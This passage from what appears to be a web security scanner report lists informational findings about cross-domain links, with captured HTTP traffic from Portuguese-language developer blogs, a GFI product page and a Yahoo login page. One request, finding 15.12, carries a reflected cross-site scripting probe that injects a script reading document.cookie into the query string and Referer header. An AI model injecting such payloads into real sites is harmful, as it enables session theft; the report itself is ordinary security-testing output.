e ser acessada (e tiver busca) ela fica mais ..til. Al..m disso, prefira usar uma tecnologia f..cil e conhecida para que todos os membros do time possam documentar. Por exemplo, se voc.. escolher usar <a href="http://en.wikipedia.org/wiki/LaTeX" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/LaTeX?referer=');">LaTeX</a>
...[SNIP]...
<p>Se o seu projeto precisa de documenta....o por qualquer motivo, a documenta....o deve fazer parte da <a href="http://agilefaq.net/2007/10/24/what-is-definition-of-done/" onclick="urchinTracker('/outgoing/agilefaq.net/2007/10/24/what-is-definition-of-done/?referer=');">&#8220;Definition of Done&#8221;</a>. .. melhor documentar no momento que as <a href="http://en.wikipedia.org/wiki/User_story" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/User_story?referer=');">hist..rias</a>
...[SNIP]...
<p><a href="http://en.wikipedia.org/wiki/Code_smell" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Code_smell?referer=');">&#8220;Code smell&#8221;</a> .. um sintoma no seu c..digo que pode indicar um problema maior. Muitas vezes c..digos precisam ser documentados porque eles s..o desnecessariamente complexos. Sempre que poss..vel <a href="http://guilherme.pro/2009/04/05/why-i-dont-write-code-comments/" onclick="urchinTracker('/outgoing/guilherme.pro/2009/04/05/why-i-dont-write-code-comments/?referer=');">prefira refatorar o c..digo para ele ficar mais f..cil de entender ao inv..s de escrever coment..rios</a>
...[SNIP]...
muda e o coment..rio fica l.. desatualizado, e isso acaba mais atrapalhando do que ajudando). Tenha uma boa suite de testes (uma suite bem escrita e organizada .. uma especifica....o execut..vel), use <a href="http://en.wikipedia.org/wiki/Domain-driven_design" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Domain-driven_design?referer=');">Domain-Driven Design</a> para expressar melhor o dom..nio do software, <a href="http://www.c2.com/cgi/wiki?SystemMetaphor" onclick="urchinTracker('/outgoing/www.c2.com/cgi/wiki?SystemMetaphor&amp;referer=');">met..foras</a>, tenha um <a href="http://c2.com/xp/XpSimplicityRules.html" onclick="urchinTracker('/outgoing/c2.com/xp/XpSimplicityRules.html?referer=');">design simples</a>, use <a href="http://en.wikipedia.org/wiki/Design_pattern_%28computer_science%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Design_pattern_28computer_science_29?referer=');">design patterns</a>
...[SNIP]...
</a> no Rio de Janeiro, criado e organizado por mim e o <a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a>
...[SNIP]...
<p>Organizar esse evento foi uma experi..ncia excepcional. Para come..ar, tivemos a sorte de todos os planetas se alinharem e termos <a href="http://twitter.com/cozimek" onclick="urchinTracker('/outgoing/twitter.com/cozimek?referer=');">v..rios</a> <a href="http://twitter.com/jacobian" onclick="urchinTracker('/outgoing/twitter.com/jacobian?referer=');">amigos</a> <a href="http://twitter.com/jeffpatton" onclick="urchinTracker('/outgoing/twitter.com/jeffpatton?referer=');">internacionais</a> presentes no Rio de Janeiro na mesma semana. Quando decidimos tornar isso um evento, a <a href="http://twitter.com/akitaonrails" onclick="urchinTracker('/outgoing/twitter.com/akitaonrails?referer=');">galera</a> <a href="http://twitter.com/guilhermecaelum" onclick="urchinTracker('/outgoing/twitter.com/guilhermecaelum?referer=');">aqui</a> <a href="http://twitter.com/paulo_caelum" onclick="urchinTracker('/outgoing/twitter.com/paulo_caelum?referer=');">do</a> <a href="http://twitter.com/viniciusteles" onclick="urchinTracker('/outgoing/twitter.com/viniciusteles?referer=');">Brasil</a>
...[SNIP]...
inscri....es e organizar todo o evento. Organizar uma confer..ncia de alta qualidade com palestrantes renomados foi uma experi..ncia ..nica, tanto para aprender o qu..o complicado .. quanto para poder <a href="http://vimeo.com/6604215" onclick="urchinTracker('/outgoing/vimeo.com/6604215?referer=');">curtir um gigantesco #horaextra</a>
...[SNIP]...
<p>Mas num dos encontros mais recentes do <a href="http://horaextra.org" onclick="urchinTracker('/outgoing/horaextra.org?referer=');">#horaextra</a>, a galera decidiu se organizar para montar um outro evento. Liderados pelo Andr.. Fonseca, Ramon Page, Rodrigo Pinto e Sylvestre Mergulh..o, todos se dispuseram a colaborar com alguma <a href="http://smallactsmanifesto.org" onclick="urchinTracker('/outgoing/smallactsmanifesto.org?referer=');">pequena a....o</a>
...[SNIP]...
<p>.. com muita felicidade que eu escrevo este post para dar a boa not..cia: vem a.. o <a href="http://devinrio.com.br" onclick="urchinTracker('/outgoing/devinrio.com.br?referer=');">Dev in Rio 2010</a>
...[SNIP]...
<li>Um evento onde o #horaextra faz parte da programa....o (com direito a <a href="http://vimeo.com/6597629" onclick="urchinTracker('/outgoing/vimeo.com/6597629?referer=');">hino</a>
...[SNIP]...
<p>Aguardem o <a href="http://devinrio.com.br" onclick="urchinTracker('/outgoing/devinrio.com.br?referer=');">Dev in Rio 2010</a>
...[SNIP]...
<p>Na ..ltima sexta-feira (30 de Julho) n..s hospedamos aqui no escrit..rio do <a href="http://br.yahoo.com" onclick="urchinTracker('/outgoing/br.yahoo.com?referer=');">Yahoo!</a> nossa primeira reuni..o do grupo <a href="http://www.dojosp.org" onclick="urchinTracker('/outgoing/www.dojosp.org?referer=');">Coding Dojo SP</a>
...[SNIP]...
<img src='http://gc.blog.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Recebemos por volta de 30 desenvolvedores que participaram de um <a href="http://codingdojo.org/cgi-bin/wiki.pl?RandoriKata" onclick="urchinTracker('/outgoing/codingdojo.org/cgi-bin/wiki.pl?RandoriKata&amp;referer=');">Randori</a> para resolver o problema de escrever n..meros por extenso em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a> (gra..as .. influ..ncia do nosso amigo Pythonista &#8220;<a href="http://isnomore.net" onclick="urchinTracker('/outgoing/isnomore.net?referer=');">rbp</a>
...[SNIP]...
<p>Acabei de escrever um <a href="http://developer.yahoo.net/blog/archives/2010/08/coding_dojo_sao_paulo.html" onclick="urchinTracker('/outgoing/developer.yahoo.net/blog/archives/2010/08/coding_dojo_sao_paulo.html?referer=');">post no blog do Yahoo! Developer Network contando com mais detalhes como foi o encontro</a> (e explicando tamb..m o que diabos .. um <a href="http://codingdojo.org" onclick="urchinTracker('/outgoing/codingdojo.org?referer=');">Coding Dojo</a>). Voc.. tamb..m pode ver algumas <a href="http://www.flickr.com/photos/guilhermechapiewski/sets/72157624640168810/" onclick="urchinTracker('/outgoing/www.flickr.com/photos/guilhermechapiewski/sets/72157624640168810/?referer=');">fotos no meu Flickr</a>
...[SNIP]...
<p>O pr..ximo encontro ser.. na semana que vem, ainda sem data definida. Para ficar por dentro das datas dos pr..ximos encontros, cadastre-se na <a href="http://groups.google.com/group/dojo_sp/" onclick="urchinTracker('/outgoing/groups.google.com/group/dojo_sp/?referer=');">lista de e-mails do grupo</a>
...[SNIP]...
<p>H.. uns dois meses estava eu numa madrugada t..pica brincado de escrever c..digos aleat..rios, dessa vez usando o <a href="http://code.google.com/appengine/" onclick="urchinTracker('/outgoing/code.google.com/appengine/?referer=');">Google App Engine</a>
...[SNIP]...
</strong> demais) fiquei t..o empolgado que soltei um daqueles posts meio aleat..rios no <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a>
...[SNIP]...
<i>&#8220;<a href="http://twitter.com/gchapiewski/status/12489805973" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski/status/12489805973?referer=');">Google App Engine kicks serious ass!</a>
...[SNIP]...
</i>. Muita gente estranhou, incluindo o meu amigo <a href="http://www.kumpera.net/blog/" onclick="urchinTracker('/outgoing/www.kumpera.net/blog/?referer=');">Rodrigo Kumpera</a>
...[SNIP]...
<i>&#8220;<a href="http://twitter.com/kumpera/status/12498606245" onclick="urchinTracker('/outgoing/twitter.com/kumpera/status/12498606245?referer=');">@gchapiewski I thought you used to work for yahoo!</a>
...[SNIP]...
</a> que fizemos em S..o Paulo em mar..o. Muitas pessoas acharam estranho e ficaram abismadas pelo fato do <a href="http://yahoo.com" onclick="urchinTracker('/outgoing/yahoo.com?referer=');">Yahoo!</a> e seus funcion..rios mostrarem hacks que faziam uso de <a href="http://maps.google.com" onclick="urchinTracker('/outgoing/maps.google.com?referer=');">Google Maps</a>, <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a>, <a href="http://facebook.com" onclick="urchinTracker('/outgoing/facebook.com?referer=');">Facebook</a>
...[SNIP]...
blog.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Agora que eu trabalho no Yahoo! tenho que usar Y! Mail ao inv..s de Gmail? Ou ent..o tenho que programar usando apenas <a href="http://developer.yahoo.com/yui/" onclick="urchinTracker('/outgoing/developer.yahoo.com/yui/?referer=');">YUI</a> ao inv..s de <a href="http://jquery.com" onclick="urchinTracker('/outgoing/jquery.com?referer=');">jQuery</a>
...[SNIP]...
</a>, mas n..o .. o que eu acredito. N..o me importo de usar <a href="http://java.sun.com" onclick="urchinTracker('/outgoing/java.sun.com?referer=');">Java</a> se for a melhor op....o para resolver meus problemas &#8211; apesar de adorar programar em <a href="http://www.ruby-lang.org" onclick="urchinTracker('/outgoing/www.ruby-lang.org?referer=');">Ruby</a>. Ou de aprender uma nova linguagem/ferramenta se ela se mostrar melhor para resolver alguma coisa (como quando eu precisei aprender <a href="http://www.actionscript.org" onclick="urchinTracker('/outgoing/www.actionscript.org?referer=');">ActionScript</a> para fazer coisas legais para o <a href="http://video.globo.com" onclick="urchinTracker('/outgoing/video.globo.com?referer=');">Globo V..deos</a> &#8211; apesar de eu nunca ter tido simpatia por <a href="http://www.adobe.com/products/flashplayer/" onclick="urchinTracker('/outgoing/www.adobe.com/products/flashplayer/?referer=');">Flash</a>
...[SNIP]...
o profissional baseado em fatos e dados, n..o em prefer..ncias, traumas ou qualquer outro argumento sem l..gica. No caso que comecei a contar no in..cio desse post, eu estava programando um webservice <a href="http://en.wikipedia.org/wiki/Representational_State_Transfer" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Representational_State_Transfer?referer=');">REST</a> em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a>
...[SNIP]...
<p>Veja s.., eu n..o acordo todo dia e vou para o trabalho s.. porque quero ganhar dinheiro ou porque sou obrigado a fazer isso. N..o fico <a href="http://twitter.com/gchapiewski/status/16757477472" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski/status/16757477472?referer=');">at.. as 5 horas da manh.. hackeando as &#8220;entranhas&#8221; do Rhino com Java</a>
...[SNIP]...
<param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=10713842&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=00ADEF&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=10713842&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=00ADEF&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="450" height="253"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/mIP4GLhtucI&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="450" height="360"></embed>
...[SNIP]...
<p>As fotos oficiais do evento est..o dispon..veis no <a href="http://www.flickr.com/photos/brhackday" onclick="urchinTracker('/outgoing/www.flickr.com/photos/brhackday?referer=');">nosso Flickr</a>. Temos tamb..m fotos tiradas pelos participantes <a href="http://www.flickr.com/groups/brhackday/pool/" onclick="urchinTracker('/outgoing/www.flickr.com/groups/brhackday/pool/?referer=');">no grupo &#8220;brhackday&#8221; do Flickr</a>
...[SNIP]...
<div class="textwidget"><a rel="license" href="http://creativecommons.org/licenses/by/2.5/br/" onclick="urchinTracker('/outgoing/creativecommons.org/licenses/by/2.5/br/?referer=');"><img alt="Creative Commons License" style="border-width:0" src="http://creativecommons.org/images/public/somerights20.png" /></a>
...[SNIP]...
</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="http://guilherme.pro" property="cc:attributionName" rel="cc:attributionURL" onclick="urchinTracker('/outgoing/guilherme.pro?referer=');">Guilherme Chapiewski</a> est&aacute; licenciado sob uma <a rel="license" href="http://creativecommons.org/licenses/by/2.5/br/" onclick="urchinTracker('/outgoing/creativecommons.org/licenses/by/2.5/br/?referer=');">Creative Commons Attribution 2.5 Brazil License</a>
...[SNIP]...
<li><a href="http://m.artins.net" onclick="urchinTracker('/outgoing/m.artins.net?referer=');">Alexandre Martins Nunes</a>
...[SNIP]...
<li><a href="http://anselmoalves.com" onclick="urchinTracker('/outgoing/anselmoalves.com?referer=');">Anselmo Alves</a>
...[SNIP]...
<li><a href="http://acarlos.com.br/blog" onclick="urchinTracker('/outgoing/acarlos.com.br/blog?referer=');">Antonio Carlos Silveira</a>
...[SNIP]...
<li><a href="http://blog.caelum.com.br" onclick="urchinTracker('/outgoing/blog.caelum.com.br?referer=');">Caelum</a></li>
<li><a href="http://lixo.org" onclick="urchinTracker('/outgoing/lixo.org?referer=');">Carlos Villela</a>
...[SNIP]...
<li><a href="http://bardusco.wordpress.com" onclick="urchinTracker('/outgoing/bardusco.wordpress.com?referer=');">Danilo Bardusco</a>
...[SNIP]...
<li><a href="http://dtsato.com/blog/default" onclick="urchinTracker('/outgoing/dtsato.com/blog/default?referer=');">Danilo Sato</a>
...[SNIP]...
<li><a href="http://plentz.org" onclick="urchinTracker('/outgoing/plentz.org?referer=');">Diego Pires Plentz</a>
...[SNIP]...
<li><a href="http://akitaonrails.com" onclick="urchinTracker('/outgoing/akitaonrails.com?referer=');">Fabio Akita</a>
...[SNIP]...
<li><a href="http://fabiokung.com" onclick="urchinTracker('/outgoing/fabiokung.com?referer=');">Fabio Kung</a>
...[SNIP]...
<li><a href="http://guilherme.pro" onclick="urchinTracker('/outgoing/guilherme.pro?referer=');">Guilherme Chapiewski (en-US)</a>
...[SNIP]...
<li><a href="http://gcirne.wordpress.com" onclick="urchinTracker('/outgoing/gcirne.wordpress.com?referer=');">Guilherme Cirne</a>
...[SNIP]...
<li><a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a>
...[SNIP]...
<li><a href="http://tapajos.me" onclick="urchinTracker('/outgoing/tapajos.me?referer=');">Marcos Tapaj..s</a>
...[SNIP]...
<li><a href="http://www.fragmental.com.br" onclick="urchinTracker('/outgoing/www.fragmental.com.br?referer=');">Phillip Cal..ado</a>
...[SNIP]...
<li><a href="http://blog.aspercom.com.br" onclick="urchinTracker('/outgoing/blog.aspercom.com.br?referer=');">Rodrigo Yoshima</a>
...[SNIP]...
<li><a href="http://blog.improveit.com.br" onclick="urchinTracker('/outgoing/blog.improveit.com.br?referer=');">Vin..cius Manh..es Teles</a>
...[SNIP]...
<p><script src="http://widgets.twimg.com/j/1/widget.js"></script></p>
<link href="http://widgets.twimg.com/j/1/widget.css" type="text/css" rel="stylesheet">
<script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://www.google.com/reader/ui/publisher-en.js"></script>
<script type="text/javascript" src="http://www.google.com/reader/public/javascript/user/13324626892444451583/state/com.google/broadcast?n=10&callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cs%3A%22false%22%2Cb%3A%22false%22%7D)%3Bnew%20GRC"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<p>
       Guilherme Chapiewski is proudly powered by
       <a href="http://wordpress.org/" onclick="urchinTracker('/outgoing/wordpress.org/?referer=');">WordPress</a>
...[SNIP]...
<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

       <script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

15.10. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /event-log-analysis-sm/?adv=69&loc=727&client=ca-dp-sphere_related_xml HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:12 GMT
Etag: "6e2f3ed9101a167ccc2f760d7ec44f1e01b39cc9"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 18 Jul 2011 18:09:12 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 18 Jul 2011 18:09:12 GMT; Path=/
Content-Length: 30166
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...
<meta name="keywords" content="event log, event log management, network wide, network events, event logs, intrusion detection" />
<link rel="shortcut icon" type="image/ico" href="http://d1nu2rn22elx8m.cloudfront.net/uploads/03YKG3/cDpAV/favicon.ico" />
<meta name="performable:screenshot" content="http://cdn.performable.com/catalog/3303.0/assets/images/sDcT6-gfi_screen3.png" />
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.gfi.com/landing/styles/styles13.css">
<script language="JavaScript" type="text/javascript" src="http://cdn.performable.com/catalog/3303.0/assets/js/q7CSP-landing.js"></script>
...[SNIP]...
<div id="bodyText"><img class="fullAwards" align="right" src="http://cdn.performable.com/customers/assets/03YKG3/MnY9L-awardsesmlanding.jpg"><p>
...[SNIP]...
<div id="prodLogo"><img src="http://cdn.performable.com/customers/assets/03YKG3/AYsaL-ESM_logo.gif" alt="GFI MailEssentials 2010"><br>
...[SNIP]...
<a href="javascript:selectWin('http://cdn.performable.com/customers/assets/03YKG3/379SJ-esm_mgntconsole.gif');"><img src="http://cdn.performable.com/customers/assets/03YKG3/39Xig-esm_mgntconsole_small.gif" alt="">Management console</a><a href="javascript:selectWin('http://cdn.performable.com/customers/assets/03YKG3/EEC2k-esm_config_sources.gif');"><img src="http://cdn.performable.com/customers/assets/03YKG3/RNyWa-esm_config_sources_small.gif" alt="">Managing event sources</a><a href="javascript:selectWin('http://cdn.performable.com/customers/assets/03YKG3/uatfT-esm_qsd.gif');"><img src="http://cdn.performable.com/customers/assets/03YKG3/37yLu-esm_qsd_small.gif" alt="">Quick start dialogue</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072728970/?label=N9X6CNbx3gEQipfC_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

15.11. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /config/login?.src=fpctx&logout=1&r= HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:21 GMT
Set-Cookie: B=76otfft6jea6h&b=3&s=5d; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: Y=%2e; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: SSL=%2e; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com; secure
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 18382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...
<META HTTP-EQUIV=Refresh CONTENT="90; URL=http://www.yahoo.com">
   <link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/fonts-2.0.0_1.1.css">
   <link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_1.2.css">
   
<style type="text/css">
...[SNIP]...
<!-- static header -->

<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.5.css">
<style type="text/css">
...[SNIP]...
<a id="ygmalogo" href="http://www.yahoo.com"><img id="ygmalogoimg" src="https://s.yimg.com/lq/i/brand/purplelogo/base/us.gif" alt="Yahoo!" name="ygmalogoimg"></a>
...[SNIP]...
</script><script src="https://a248.e.akamai.net/sec.yimg.com/a/1-/jscodes/flash8/yad_20071204.js"></script>
...[SNIP]...
VRGKImmk-/J=1295460561312493/K=syh76DyOYzy2ESmCcEYaLg/A=5207190/R=2/id=noscript/SIG=12q4c63l2/*http://searchmarketing.yahoo.com/arp/sponsoredsearch.php?o=US2364&cmp=YBanners&ctv=b&s=b" target="_blank"><img src="https://a248.e.akamai.net/sec.yimg.com/a/ya/yahoo_ysm/013008_bus_425x600.jpg" width="425" height="600" border="0"></a>
...[SNIP]...

15.12. http://rafael.adm.br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 HTTP/1.1
Host: rafael.adm.br
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; __utmc=140391216; __utmb=140391216.1.10.1295459905; nvgpfl=547362597; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 17:57:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding, Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Content-Length: 43076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://rafael.adm.br/wp-content/themes/mainstream/style.css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://feeds.feedburner.com/rafael_lima" />
<link rel="pingback" href="http://rafael.adm.br/xmlrpc.php" />
   <link rel="openid.server" href="http://www.myopenid.com/server" />
   <link rel="openid.delegate" href="http://rafael.lima.myopenid.com/" />

<!--[if IE 6]>
...[SNIP]...
<li class="page_item"><a href="http://scr.im/rafaelp" title="Enviar e-mail">E-mail</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/rafael_lima" title="RSS"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/ico-rss.png" alt="RSS icon" />
...[SNIP]...
<li><a href="http://feeds.feedburner.com/rafael_lima_podcast" title="Podcast"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/ico-podcast.png" alt="Podcast icon" />
...[SNIP]...
<li><a href="http://twitter.com/rafaelp" title="Twitter"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/ico-twitter.png" alt="Twitter icon" />
...[SNIP]...
<li><a href="http://github.com/rafaelp" title="Github"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/ico-github.png" alt="Github icon" />
...[SNIP]...
<div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Frafael.adm.br%2Fp%2Fsuas-metas-devem-ser-smart%2F&amp;source=rafaelp&amp;style=normal&amp;service=bit.ly" height="61" width="50" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
<div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Frafael.adm.br%2Fp%2Foxente-rails-2010%2F&amp;source=rafaelp&amp;style=normal&amp;service=bit.ly" height="61" width="50" frameborder="0" scrolling="no"></iframe></div><p>O <a href="http://oxenterails.com.br">Oxente Rails 2010</a>
...[SNIP]...
no passado e incluiu empreendedorismo na grade de temas. Nada mais perfeito que Rails + Empreendedorismo para mim, que trabalho com desenvolvimento de aplicativos web inovadores escritos em Rails pela <a href="http://bielsystems.com.br">BielSystems</a>
...[SNIP]...
<p>No final de cada dia rolou um <a href="http://horaextra.org">#horaextra</a>
...[SNIP]...
<p>Eu gostaria de parabenizar toda a equipe da organiza....o do Evento e especialmente ao <a href="http://twitter.com/fagiani">Paulo Fagiani</a> que idealizou o <a href="http://oxenterails.com.br">Oxente Rails</a>
...[SNIP]...
<p>A minha palestra foi &#8220;<a href="http://www.slideshare.net/rafael_lima/transformando-ideias-em-negcios-rentveis">Transformando ideias em neg..cios rent..veis</a>&#8220;. O objetivo foi compartilhar o que eu tenho feito e o que eu aprendi no processo de marketing do <a href="http://cobregratis.com.br">Cobre Gr..tis</a>
...[SNIP]...
<div id="__ss_4969556" style="width: 425px;"><object id="__sse4969556" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="allowfullscreen" value="true" /><embed id="__sse4969556" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=transformandoideiasemnegociosrentaveis-100814101812-phpapp02&amp;rel=0&amp;stripped_title=transformando-ideias-em-negcios-rentveis" name="__sse4969556" allowscriptaccess="always" allowfullscreen="true"></embed></object>(Ver outras..<a href="http://www.slideshare.net/">apresenta....es no SlideShare</a>
...[SNIP]...
<div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Frafael.adm.br%2Fp%2Fgalera-no-edted%2F&amp;source=rafaelp&amp;style=normal&amp;service=bit.ly" height="61" width="50" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</a>, usei a <a href="http://www.slideshare.net/rafael_lima/bootstrapping-de-uma-aplicao-web">mesma apresenta....o</a>
...[SNIP]...
<div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Frafael.adm.br%2Fp%2Fdefinicao-de-metas-e-prioridades%2F&amp;source=rafaelp&amp;style=normal&amp;service=bit.ly" height="61" width="50" frameborder="0" scrolling="no"></iframe></div><p>Em resposta ao <a href="http://twitter.com/arsolto/statuses/10125064363">Tweete do Alan</a>
...[SNIP]...
</a>, eu mudei bastante meu comportamento. Como o <a href="http://blog.fabioseixas.com.br/">F..bio Seixas</a> me disse ontem, no <a href="http://www.circuito4x1.com.br/">Circuito 4&#215;1</a>
...[SNIP]...
<div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Frafael.adm.br%2Fp%2Fprogramador-lento%2F&amp;source=rafaelp&amp;style=normal&amp;service=bit.ly" height="61" width="50" frameborder="0" scrolling="no"></iframe></div><p>Na <a href="http://myfreecomm.com.br">Myfreecomm</a> temos alguns programadores lentos, gra..as a Deus. Conversando sobre isso com o <a href="http://henriquebastos.net">Henrique</a>
...[SNIP]...
<p>Depois de bastante tempo sem programar, eu passei dois dias escrevendo um pequeno sistema para integrar a parte de pagamento de uma aplica....o com o <a href="http://paypal.com">Paypal</a>
...[SNIP]...
ano apenas gerenciando projetos e equipes, e estudando metodologias ..geis, me fez optar por escrever uma aplica....o 100% testada, em Ruby, utilizando Sinatra. Gostaria de aproveitar para agradecer o <a href="http://rafaelss.com/">Rafael Souza</a>
...[SNIP]...
</p>
<a class="noborder" href="http://feeds.feedburner.com/rafael_lima"><img src="http://feeds.feedburner.com/~fc/rafael_lima?bg=99CCFF&amp;fg=444444&amp;anim=0" height="26" width="88" style="border:0; margin:0 1em 0 0" alt="" align="left" /></a>
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
